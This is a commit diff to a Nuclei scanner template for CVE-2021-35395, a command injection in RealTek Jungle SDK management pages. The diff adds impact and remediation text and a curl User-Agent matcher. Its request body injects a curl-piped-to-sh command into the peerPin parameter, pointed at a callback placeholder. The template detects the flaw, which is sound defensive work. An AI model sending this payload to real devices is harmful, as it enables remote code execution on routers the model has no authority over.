updated template

projectdiscovery · Oct 8, 2023 · 4786908 · 4786908
1 parent ddc4d97
commit 4786908
Showing 1 changed file with 12 additions and 1 deletion.
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
@@ -1,13 +1,18 @@
 id: CVE-2021-35395
+
 info:
   name: RealTek Jungle SDK - Arbitrary Command Injection
   author: king-alexander
   severity: critical
   description: There is a command injection vulnerability on the "formWsc" page of the management interface.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
+  remediation: |
+    Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
     - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
-  tags: cve,kev
+  tags: cve,cve2021,realtek,rce,kev
 
 http:
   - raw:
@@ -18,8 +23,14 @@ http:
         # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
         submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
 
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol
         words:
           - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"